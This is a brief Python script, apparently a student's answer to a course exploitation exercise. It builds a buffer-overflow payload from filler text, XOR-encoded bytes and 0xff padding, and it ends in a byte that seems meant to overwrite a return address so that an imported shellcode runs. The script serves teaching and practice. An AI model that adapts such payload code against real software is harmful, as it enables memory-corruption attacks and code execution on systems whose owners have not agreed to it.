#!/usr/bin/env python3

import sys
import egg as p
from egg import SHELLCODE, sc_len

# Configure Python to print text strings like byte strings. Don't remove this!
sys.stdout.reconfigure(encoding='latin1')

### YOUR CODE HERE ###

# payload = ''.join((chr(0x20^ord(c)) for c in SHELLCODE))
print('joke' + ''.join((chr(0x20^ord(c)) for c in '\x9c\xdf\xff\xff')) ,end='')
print('fart', end= '\xff'*(64-12) + chr(0x20^ord('\xa0')))
